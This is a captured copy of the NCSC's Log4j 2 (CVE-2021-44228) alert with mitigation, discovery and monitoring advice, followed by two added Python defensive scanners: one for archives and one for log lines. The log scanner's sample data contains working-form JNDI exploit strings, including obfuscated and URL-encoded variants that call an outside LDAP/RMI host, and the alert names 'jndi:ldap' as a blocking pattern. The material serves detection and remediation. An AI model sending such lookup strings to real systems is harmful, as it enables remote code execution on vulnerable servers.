www.ncsc.gov.uk
Submitted URL: https://information.crowncommercial.gov.uk/e/811463/ews-apache-log4j-vulnerability/tgn22/399588411?h=al1zorBAcvxhnPuBKuFmr95ODw6Fp1Ez1uso4J...
Effective URL: https://www.ncsc.gov.uk/news/apache-log4j-vulnerability
Submission: On December 14 via manual from IN — Scanned from DE
ALERT: APACHE LOG4J 2 VULNERABILITY (CVE-2021-44228)

The NCSC is advising organisations to take steps to mitigate the Apache Log4j 2 vulnerability.

14 December 2021

UPDATE (13/12/21): This alert has been revised and now includes detection and enhanced mitigation advice.

An unauthenticated remote code execution vulnerability (CVE-2021-44228) is affecting multiple versions of the Apache Log4j 2 library. The NCSC is aware that scanning and attempted exploitation is being detected globally, including in the UK. Proof-of-concept code has been published for this vulnerability.

--------------------------------------------------------------------------------

DETAILS

Log4j 2 is an open-source Java logging library developed by the Apache Foundation. It is widely used in many applications and is present in many services as a dependency. This includes enterprise applications, including custom applications developed within an organisation, as well as numerous cloud services.
The Log4j 2 library is frequently used in enterprise Java software and is included in Apache frameworks including:

* Apache Struts2
* Apache Solr
* Apache Druid
* Apache Flink
* Apache Swift

Other large projects, including Netty, MyBatis and the Spring Framework, also make use of the library.

An application is vulnerable if it consumes untrusted user input and passes this to a vulnerable version of the Log4j logging library.

Version 1 of the Log4j library is no longer supported and is affected by multiple security vulnerabilities. Developers should migrate to the latest version of Log4j 2. More information is available at:

* log4j/2 security
* log4j/2 download

--------------------------------------------------------------------------------

RECOMMENDED PRIORITY ACTIONS

1. INSTALL THE LATEST UPDATES IMMEDIATELY WHEREVER LOG4J IS KNOWN TO BE USED

This should be the first priority for all UK organisations using software that is known to include Log4j. The Log4j 2 library is frequently used in software and the links below provide non-exhaustive lists of vulnerable products:

* Mvnrepository - Artifacts using Apache Log4j Core
* Github - Log4j overview related software

If your specific product is not listed, you can use the instructions provided below in Priority Action 2 to try to determine if Log4j is present. If your product is listed, please follow vendor advice on updating the software or applying mitigations. You should also keep refreshing the list in case a new product has been added. If your product is not listed and is vulnerable, you can request it be added to the list.

Where a vendor has not provided an update to a product, the vulnerability can be mitigated in previous releases of Log4j 2 (2.10 and later) by setting the system property "log4j2.formatMsgNoLookups" to "true" or removing the JndiLookup class from the classpath.

Organisations should routinely run vulnerability scanning across their networks, to detect when updates are available.
2. DISCOVER UNKNOWN INSTANCES OF LOG4J WITHIN YOUR ORGANISATION

To support the first priority action above, you should also now determine if Log4j is installed elsewhere. Java applications can include all the dependent libraries within their installation. A file system search for log4j can be undertaken. This should include searching inside EAR, JAR and WAR files. For example:

    find / -type f -print0 | xargs -n1 -0 zipgrep -i log4j2 2>/dev/null

If a dependency or package manager is used, this can be searched. For example:

    dpkg -l | grep log4j

There could be multiple copies of Log4j present; each copy will need to be updated or mitigated.

3. DEPLOY PROTECTIVE NETWORK MONITORING/BLOCKING

The following recommendations should be taken to improve network monitoring and blocking:

* Organisations using Web Application Firewalls (WAFs) should ensure rules are available to protect against this vulnerability. These could include blocking URLs containing strings like “jndi:ldap”. It should be noted that variants of the exploit string may bypass current WAF rules. This means WAFs should not be relied on as the only control.
* The log files for any services using affected Log4j versions could contain user-controlled strings, for example “jndi:ldap”.
* If your organisation is storing netflow data for your network’s internet connections, or you have robust EDR coverage of servers, you should search for internally initiated LDAP connections to external destinations not seen before 10 December 2021. This may indicate exploitation and, if detected, you should search the initiating host for the presence of Log4j using the above methods. DNS queries by the server around the LDAP connection should also be reviewed, as sensitive information could have been exfiltrated over DNS.
* YARA rules for a variety of scenarios are available should organisations have the tooling to query using them: log4j RCE Exploitation Detection

--------------------------------------------------------------------------------

ADDITIONAL INFORMATION

ADVICE TO DEVELOPERS OF AFFECTED SOFTWARE

It may not always be easy for organisations to identify which products use Apache Log4j 2 software. If you are a developer of any affected software, the NCSC advises early communication with your customers to enable them to apply mitigations or install updates where they are available.

NCSC TOOLS, SERVICES AND GUIDANCE

The NCSC provides a range of free tools and services that help to secure systems:

* Follow NCSC guidance including Preventing Lateral Movement
* Sign up for Early Warning
* Central government departments can take advantage of NCSC Host Based Capability
* Vulnerability Disclosure Toolkit – ensure organisations have a basic approach to receiving reports from researchers who might discover the presence of vulnerable Log4j systems.

REPORTING A COMPROMISE

Affected UK organisations should report any evidence of compromise relating to this vulnerability to the NCSC via our website https://report.ncsc.gov.uk/

The NCSC is aware of widespread scanning for this vulnerability and we note that almost all organisations will have received HTTP requests with the JNDI string. We do not require reports of scanning activity. However, please notify the NCSC of any cases where you have identified malicious Java being loaded into one of your systems, or where any follow-on activity has occurred.

TOPICS

Vulnerabilities
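The zipgrep search in Priority Action 2 tells you that the string log4j2 appears inside an archive, but not which version of log4j-core is present or whether the JndiLookup class removal from Priority Action 1 has already been applied. The script below is an added example and is not NCSC tooling: it walks a directory tree, opens every JAR, WAR and EAR, recurses into archives bundled inside them, reads the log4j-core version from Maven's pom.properties and reports whether org/apache/log4j/core/lookup/JndiLookup.class is still on board. The sample tree it builds when run without arguments (a WAR bundling an unmitigated copy, and a standalone JAR with the class removed) is constructed test data, not a real product.

```python
"""Added example (not NCSC tooling): locate Log4j 2 copies inside JAR, WAR and
EAR files, including archives nested inside other archives, and report whether
the JndiLookup class is still present.  Standard library only."""
import io
import os
import re
import sys
import tempfile
import zipfile

# Entry name Log4j 2 uses for the class the NCSC mitigation removes.
JNDI_CLASS = "org/apache/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
# Maven-built log4j-core JARs carry their version in this properties file.
POM_PROPS = re.compile(r"META-INF/maven/org\.apache\.logging\.log4j/log4j-core/pom\.properties$")


def inspect_archive(data, label):
    """Inspect one archive held in memory; recurse into nested archives.

    Returns a list of findings, one per log4j-core copy found:
    {"path": label, "version": "2.14.1" or None, "jndi_lookup": bool}.
    """
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings  # not a zip container (e.g. a mislabelled file)
    names = zf.namelist()
    version = None
    for name in names:
        if POM_PROPS.search(name):
            for line in zf.read(name).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
    has_jndi = JNDI_CLASS in names
    if version is not None or has_jndi:
        findings.append({"path": label, "version": version, "jndi_lookup": has_jndi})
    # Fat JARs and WAR/EAR bundles ship libraries as archives inside the archive.
    for name in names:
        if name.lower().endswith(ARCHIVE_EXT):
            findings.extend(inspect_archive(zf.read(name), label + "!" + name))
    return findings


def scan_tree(root):
    """Walk a directory tree and inspect every archive file found."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in sorted(files):
            if fname.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, fname)
                with open(path, "rb") as fh:
                    findings.extend(inspect_archive(fh.read(), path))
    return findings


def build_sample_app(root):
    """Constructed test fixture (not a real product): app.war bundles an
    unmitigated log4j-core 2.14.1; lib/ holds a copy with JndiLookup removed."""
    def make_jar(entries):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as z:
            for name, body in entries.items():
                z.writestr(name, body)
        return buf.getvalue()

    props = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
    unmitigated = make_jar({props: "version=2.14.1\n", JNDI_CLASS: b"\xca\xfe\xba\xbe"})
    mitigated = make_jar({props: "version=2.14.1\n"})
    war = make_jar({"WEB-INF/lib/log4j-core-2.14.1.jar": unmitigated})
    os.makedirs(os.path.join(root, "lib"), exist_ok=True)
    with open(os.path.join(root, "app.war"), "wb") as fh:
        fh.write(war)
    with open(os.path.join(root, "lib", "log4j-core-2.14.1.jar"), "wb") as fh:
        fh.write(mitigated)


def demo():
    """Build the constructed sample tree in a temporary directory and scan it."""
    root = tempfile.mkdtemp()
    build_sample_app(root)
    return scan_tree(root)


if __name__ == "__main__":
    # Usage: python log4j_find.py [directory]; with no argument the sample tree is scanned.
    hits = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for hit in hits:
        state = "JndiLookup PRESENT" if hit["jndi_lookup"] else "JndiLookup removed"
        print(f"{hit['path']}: log4j-core {hit['version']} ({state})")
```

A finding with the JndiLookup class present needs either the vendor update or one of the two mitigations from Priority Action 1; the reported version also tells you whether the log4j2.formatMsgNoLookups property applies, since the alert states it works only for 2.10 and later.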
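Priority Action 3 points out that log files may hold user-controlled strings such as “jndi:ldap”, and that variants of the exploit string can slip past a plain substring rule. The scanner below is an added example, not NCSC tooling: it URL-decodes each log line, collapses nested ${...} lookups from the inside out (resolving only the lower, upper and :- default forms, and never resolving a jndi lookup itself so the evidence is kept intact), and then reports every ${jndi:<scheme>:...} lookup with its scheme and line number. The access-log lines are constructed sample data using RFC 5737 documentation addresses.

```python
"""Added example (not NCSC tooling): find Log4j JNDI lookup strings in log lines,
including URL-encoded and nested-lookup forms that a plain "jndi:ldap"
substring match misses.  Standard library only."""
import re
import urllib.parse

# Innermost ${...} lookup (no nested $, { or } inside).
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A normalised JNDI lookup: ${jndi:<scheme>:...
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)


def _resolve_one(body):
    """Reduce one lookup body far enough to expose the text it contributes:
    'x:-j' -> 'j' (default value), 'lower:J' -> 'j', 'upper:j' -> 'J'.
    Other lookups (env:, sys:, date:, ...) contribute nothing we need to see."""
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, _, rest = body.partition(":")
    if prefix.lower() == "lower":
        return rest.lower()
    if prefix.lower() == "upper":
        return rest.upper()
    return ""


def _collapse(match):
    body = match.group(1)
    if body.lower().startswith("jndi:"):
        return match.group(0)  # keep the JNDI lookup itself as evidence
    return _resolve_one(body)


def normalise(text):
    """URL-decode, then collapse nested lookups from the inside out."""
    text = urllib.parse.unquote(text)
    for _ in range(16):  # bound the work on hostile input
        new = INNER_LOOKUP.sub(_collapse, text)
        if new == text:
            break
        text = new
    return text


def find_jndi(line):
    """Return [(scheme, lookup_string), ...] for one log line."""
    norm = normalise(line)
    hits = []
    for m in JNDI_RE.finditer(norm):
        end = norm.find("}", m.end())
        end = len(norm) if end == -1 else end + 1
        hits.append((m.group(1).lower(), norm[m.start():end]))
    return hits


def scan_lines(lines):
    """Return [(line_number, hits), ...] for lines that contain a JNDI lookup."""
    results = []
    for number, line in enumerate(lines, start=1):
        hits = find_jndi(line)
        if hits:
            results.append((number, hits))
    return results


# Constructed sample access-log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.5 - - [12/Dec/2021:10:01:04 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.5 - - [12/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:J}ndi:rmi://198.51.100.7:1099/c}"',
]

if __name__ == "__main__":
    for number, hits in scan_lines(SAMPLE_LOG):
        for scheme, lookup in hits:
            print(f"line {number}: {scheme} lookup {lookup}")
```

The scheme and host in each hit are what you carry into the netflow and EDR check in the same section: an outbound LDAP or RMI connection from the logging host to that destination, not seen before 10 December 2021, is the signal the alert asks you to look for.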
* PUBLISHED: 10 December 2021
* NEWS TYPE: Alert
* WRITTEN FOR: Large organisations; Public sector; Cyber security professionals